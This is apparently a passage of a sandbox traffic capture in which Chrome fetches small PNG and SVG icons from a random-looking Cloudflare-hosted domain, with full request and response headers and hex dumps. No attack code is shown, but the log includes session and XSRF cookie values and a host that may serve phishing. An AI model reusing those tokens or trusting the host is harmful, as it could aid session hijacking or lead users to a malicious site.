                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC641INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 727
                                                              Connection: close
                                                              Content-Disposition: inline; filename="qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7fwMEUN2WzQ%2FR681PNjoe7pwTQEV2DVhRqKxt4VDLfTG5sxGrBgW2RDPm1jFwS%2Bjo1x4XQM8PbdGjL19mWogCMI2MRjMZewuUg2rmLM2a6dC0LLpltbFylbeODn%2BpA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e5e3a8cb9-EWR
                                                              2024-07-03 07:41:08 UTC727INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 30 00 00 00 30 08 06 00 00 00 57 02 f9 87 00 00 02 9e 49 44 41 54 68 43 ed 97 81 51 1c 31 0c 45 8f 0e a0 83 a3 03 e8 60 a9 00 a8 20 a4 02 a0 82 90 0a a0 03 ae 83 90 0a b2 54 00 1d e4 3a 80 0e c8 7f 37 72 c6 ec dc ad e5 b5 73 77 3b 59 cf 68 18 f6 64 4b 5f 5f 92 e5 83 d9 c8 d7 c1 c8 fd 9f 4d 00 76 cd e0 c4 c0 c4 40 61 04 fe df 14 6a 9a e6 50 c1 3b 91 9c 4b 1a 09 ff b3 5e 25 ef 92 e7 b6 6d 17 85 01 4e 6e 1f c4 80 9c bf d1 c9 d7 92 79 d2 c2 6c f6 5d 40 ee 1c 7a 83 54 b2 00 58 d4 1f 65 e9 c2 ac b5 44 5a f2 24 59 1a 0b b0 12 98 e1 6f 60 e5 4c 40 60 a6 ea 72 03 30 e7 7f 99 73 38 42 64 1f fa bc 31 a6 ee 4d 87 3d c7 b5 41 e4 00 f8 61 91 27 c7 2f e5 08 11 4f 2e 81 80 05 40 34 12 6d 6b cf 92 9b 32 14 5c 00 a2
                                                              Data Ascii: PNGIHDR00WIDAThCQ1E` T:7rsw;YhdK__Mv@ajP;K^%mNnyl]@zTXeDZ$Yo`L@`r0s8Bd1M=Aa'/O.@4mk2\


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              62192.168.2.662944188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1444OUTGET /kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC650INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="kldibCibzXsTOdNtNAZcyznJMPZFnrycjnb52eIM56170"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vCusH4X8gwxphl%2FmNqS8cFI%2FzmXLUbukXVqHawAyDpNLMwpJugbRkUnEcQlGkMmxuYuOLLBKJuwN5iMGA1ikeNsttIcLd333%2F9Z9lZ6%2F0dCLflhHgmDwNOfhfwHeHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e58228c6f-EWR
                                                              2024-07-03 07:41:08 UTC719INData Raw: 31 63 64 65 0d 0a 3c 73 76 67 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0d 0a 3c 6d 61 73 6b 20 69 64 3d 22 30 37 62 32 36 30 33 34 2d 35 36 61 33 2d 34 39 64 32 2d 38 66 32 36 2d 63 37 62 38 34 65 62 34 65 65 64 34 22 20 66 69 6c 6c 3d 22 23 66 66 66 66 66 66 22 3e 0d 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 33 2e 39 37 36 32 20 30 43 31 36 2e 38 32 34 34 20 30 20 31 30 2e 39 37 30 37 20 35 2e 32 34 33 32 35 20 31
                                                              Data Ascii: 1cde<svg width="48" height="48" viewBox="0 0 48 48" fill="none" xmlns="http://www.w3.org/2000/svg"><mask id="07b26034-56a3-49d2-8f26-c7b84eb4eed4" fill="#ffffff"><path fill-rule="evenodd" clip-rule="evenodd" d="M23.9762 0C16.8244 0 10.9707 5.24325 1
                                                              2024-07-03 07:41:08 UTC1369INData Raw: 2e 32 33 35 34 20 33 38 2e 34 36 39 34 43 31 34 2e 33 30 38 37 20 33 33 2e 39 39 38 37 20 31 38 2e 38 33 36 38 20 33 30 2e 38 39 38 31 20 32 34 2e 30 38 39 31 20 33 30 2e 38 39 38 31 43 32 39 2e 32 33 39 35 20 33 30 2e 38 39 38 31 20 33 33 2e 36 39 33 36 20 33 33 2e 38 37 39 37 20 33 35 2e 38 31 39 34 20 33 38 2e 32 31 30 39 43 33 33 2e 39 33 30 32 20 34 30 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39
                                                              Data Ascii: .2354 38.4694C14.3087 33.9987 18.8368 30.8981 24.0891 30.8981C29.2395 30.8981 33.6936 33.8797 35.8194 38.2109C33.9302 40.6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19
                                                              2024-07-03 07:41:08 UTC1369INData Raw: 2e 36 31 31 39 20 33 31 2e 34 33 39 39 20 34 32 2e 38 39 35 34 20 32 38 2e 31 37 34 34 20 34 34 2e 38 39 33 39 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 43 32 35 2e 35 30 34 37 20 34 36 2e 35 33 37 34 20 32 32 2e 32 30 33 37 20 34 36 2e 35 32 39 33 20 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 31 39 2e 35 39 38 38 20 34 34 2e 39 30 30 37 43 31 36 2e 34 38 37 36 20 34 32 2e 39 36 37 32 20 31 34 2e 30 38 34 32 20 34 30 2e 37 37 33 38 20 31 32 2e 32 33 35 34 20 33 38 2e 34 36 39 34 5a 4d 33 31 2e 37 33 35 32 20 31 32 2e 31 36 34 34 43 32 36 2e 35 37 33 36 20 31 31 2e 36 39 39 35 20 32 31 2e 33 38 32 37 20 31 31 2e 36 39 35 32 20 31 36 2e 32 32 30 35 20 31
                                                              Data Ascii: .6119 31.4399 42.8954 28.1744 44.8939L28.1724 44.8952L28.1703 44.8965C25.5047 46.5374 22.2037 46.5293 19.6031 44.9034L19.6009 44.902L19.5988 44.9007C16.4876 42.9672 14.0842 40.7738 12.2354 38.4694ZM31.7352 12.1644C26.5736 11.6995 21.3827 11.6952 16.2205 1
                                                              2024-07-03 07:41:08 UTC1369INData Raw: 34 34 2e 38 39 33 39 5a 4d 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 4c 32 36 2e 30 38 34 20 34 31 2e 34 38 33 36 4c 32 36 2e 30 37 36 37 20 34 31 2e 34 38 38 31 4c 32 38 2e 31 37 32 34 20 34 34 2e 38 39 35 32 5a 4d 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 4c 32 36 2e 30 37 34 36 20 34 31 2e 34 38 39 34 4c 32 36 2e 30 37 33 34 20 34 31 2e 34 39 30 32 4c 32 38 2e 31 37 30 33 20 34 34 2e 38 39 36 35 5a 4d 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 4c 31 37 2e 34 38 31 20 34 38 2e 32 39 34 31 4c 31 37 2e 34 38 32 36 20 34 38 2e 32 39 35 4c 31 39 2e 36 30 33 31 20 34 34 2e 39 30 33 34 5a 4d 31 39 2e 36 30 30 39 20 34 34 2e 39 30 32 4c 32 31 2e 37 32 33 20 34 31 2e 35 31 31 33 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 31 39 2e 36 30 30 39 20 34
                                                              Data Ascii: 44.8939ZM28.1724 44.8952L26.084 41.4836L26.0767 41.4881L28.1724 44.8952ZM28.1703 44.8965L26.0746 41.4894L26.0734 41.4902L28.1703 44.8965ZM19.6031 44.9034L17.481 48.2941L17.4826 48.295L19.6031 44.9034ZM19.6009 44.902L21.723 41.5113L21.7129 41.505L19.6009 4
                                                              2024-07-03 07:41:08 UTC1369INData Raw: 33 20 34 37 2e 33 31 32 35 20 32 39 2e 31 34 30 37 20 34 37 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 33 39 2e 33 31 32 35 5a 4d 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 43 33 39 2e 33 31 32 35 20 32 31 2e 31 30 36 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 31 37 38 20 33 39 2e 33 31 32 35 20 32 31 2e 31 32 38 37 48 34 37 2e 33 31 32 35 43 34 37 2e 33 31 32 35 20 32 31 2e 30 39 38 32 20 34 37 2e 33 31 32 34 20 32 31 2e 30 36 37 36 20 34 37 2e 33 31 32 32 20 32 31 2e 30 33 37 4c 33 39 2e 33 31 32 34 20 32 31 2e 30 39 36 5a 4d 33 39 2e 33 31 32 35 20 32 30 2e 39 34 31 32 43 33 39 2e 33 31 32 35 20 32 30 2e 39 37 38 20 33 39 2e 33 31 32 34 20 32 31 2e 30 31 34 39 20 33 39 2e 33 31 32 33 20 32 31 2e 30 35 31 39 4c 34 37 2e 33 31 32 32 20 32 31 2e 30 38 31 31
                                                              Data Ascii: 3 47.3125 29.1407 47.3125 21.1287H39.3125ZM39.3124 21.096C39.3125 21.1068 39.3125 21.1178 39.3125 21.1287H47.3125C47.3125 21.0982 47.3124 21.0676 47.3122 21.037L39.3124 21.096ZM39.3125 20.9412C39.3125 20.978 39.3124 21.0149 39.3123 21.0519L47.3122 21.0811
                                                              2024-07-03 07:41:08 UTC1203INData Raw: 2e 34 38 39 20 34 38 2e 32 39 39 4c 32 31 2e 37 31 32 39 20 34 31 2e 35 30 35 4c 32 31 2e 37 31 30 37 20 34 31 2e 35 30 33 37 4c 31 37 2e 34 38 36 38 20 34 38 2e 32 39 37 37 5a 4d 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 43 31 31 2e 32 35 34 31 20 34 33 2e 36 33 38 33 20 31 34 2e 30 30 31 31 20 34 36 2e 31 33 31 34 20 31 37 2e 34 38 37 34 20 34 38 2e 32 39 38 4c 32 31 2e 37 31 30 32 20 34 31 2e 35 30 33 33 43 31 38 2e 39 37 34 32 20 33 39 2e 38 30 33 20 31 36 2e 39 31 34 33 20 33 37 2e 39 30 39 33 20 31 35 2e 33 35 35 33 20 33 35 2e 39 36 36 33 4c 39 2e 31 31 35 33 39 20 34 30 2e 39 37 32 36 5a 4d 31 36 2e 35 37 32 38 20 31 36 2e 31 33 36 31 43 32 31 2e 34 39 38 34 20 31 35 2e 37 30 30 36 20 32 36 2e 34 35 31 33 20 31 35 2e 37 30 34 37 20 33 31 2e 33
                                                              Data Ascii: .489 48.299L21.7129 41.505L21.7107 41.5037L17.4868 48.2977ZM9.11539 40.9726C11.2541 43.6383 14.0011 46.1314 17.4874 48.298L21.7102 41.5033C18.9742 39.803 16.9143 37.9093 15.3553 35.9663L9.11539 40.9726ZM16.5728 16.1361C21.4984 15.7006 26.4513 15.7047 31.3
                                                              2024-07-03 07:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              63192.168.2.662945188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1449OUTGET /mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC653INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="mnP7Z0RTacSIM9CxKvK5WayGyklgNKAsEypvOzHpfU2cP90150"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V99eC4AruFwMVz7vvcmfR5lnBo7MGS6M7bKJRJ%2F0amboNMwyYBygPwbp%2BsDoTtKSVU9B7xKBTV8UGVbwRppz5xFbLoi1%2BBKWDYCSd3uXwDbyD2IMMnEIuCJ7AbejXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e589e2369-EWR
                                                              2024-07-03 07:41:08 UTC277INData Raw: 31 30 65 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 20 31 32 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 31 32 22 20 68 65 69 67 68 74 3d 22 31 32 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 37 2c 36 2c 31 32 2c 31 31 2e 33 30 39 2c 31 31 2e 33 30 39 2c 31 32 2c 36 2c 36 2e 37 2e 36 39 31 2c 31 32 2c 30 2c 31 31 2e 33 30 39 2c 35 2e 33 2c 36 2c 30 2c 2e 36 39 31 2e 36 39 31 2c 30 2c 36 2c 35 2e 33 2c 31 31 2e 33 30 39 2c 30 2c 31 32 2c 2e 36 39 31 5a 22 20 66 69
                                                              Data Ascii: 10e<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fi
                                                              2024-07-03 07:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              64192.168.2.662943188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1457OUTGET /opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IlZpT0pEZ00vemxEKzdZb0VNV1oyNEE9PSIsInZhbHVlIjoiUUZIcFpmeU1sZHZoR3VDZ052RU1MWG45aGMvTU1vcGpUcE9EQ25QVzF0QmpYU0U4QmxPRngzck5TUG1POVBTc0tNeUJMNGZ3WVd6VGVJcm1vRDFuNFJ0ekc5Q2xETnp6ODNOam8vNUdqNE11TWVBR3JTanYyTXl6YW1XWURhRFYiLCJtYWMiOiI0Y2IxNWQ5NjIxOTliYjllODJiN2Q5YjQ2NzEwZTEwYmNiYWQ0ZjEyYTg5ZjJhNTMwMmE4ODE5ZjIwZWNjYTc1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlV2cjJOVjhqVmxzVVlXbVFCRTdXdXc9PSIsInZhbHVlIjoiL1lGNXNBNmQ2Wk5NUi9EVHkzRUhEZjVVR3paUktwMlM5cWpSMmpUTFNseWxYdUVjeFpzZHlyTS9JWVBFdzhxNmxWZldsdzZBNCtmcHpqQUJGMnlnZkRCYU1PMEdrN3lOZG9XUFNLV2hPUExLcy96S0NmbFdpTjdPQjJuTTAvREsiLCJtYWMiOiJkNzljNWY1NDI2ZmRmZGNhN2U2MjNkZWFmYWU3NTc0YzM4N2JhOTYyNDJkOTU5NWRhMDU0MDMxYzU5ZWNlYjE3IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC659INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="opQX1gSU09O17E3k10USpNWJby3griWtsKreijbClabV2GbvNaQkTef200"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rTV5b20XVAMvMhk0NXvoi0Z6Owt%2Fm8NGHg5%2BeS12rae2HLJ165EsfOeElB7RNGbjHcCvoaO4gUy27Sjao38YY4ZrzFoZqfJfsAayS9qkNwxcH016YN4SVvxBAxyMrQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e5824425e-EWR
                                                              2024-07-03 07:41:08 UTC275INData Raw: 31 30 63 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 72 65 63 74 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 30 2c 33 32 48 33 38 56 31 38 2e 31 32 35 4c 32 34 2c 32 35 2e 31 30 39 2c 31 30 2c 31 38 2e 31 32 35 56 33 32 6d 2e 32 33 34 2d 31 36 4c 32 34 2c 32 32 2e 38 39 31 2c 33 37 2e 37 36 36 2c 31 36 48 31 30 2e 32 33 34 4d 34 30 2c 33 34 48 38 56 31 34 48 34 30 5a 22 20 66 69 6c 6c
                                                              Data Ascii: 10c<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill
                                                              2024-07-03 07:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              65192.168.2.662941188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1443OUTGET /wxygRZbM3kOCvEcFjIDlEKamnOMWqU6ryQDaTnQ90180 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
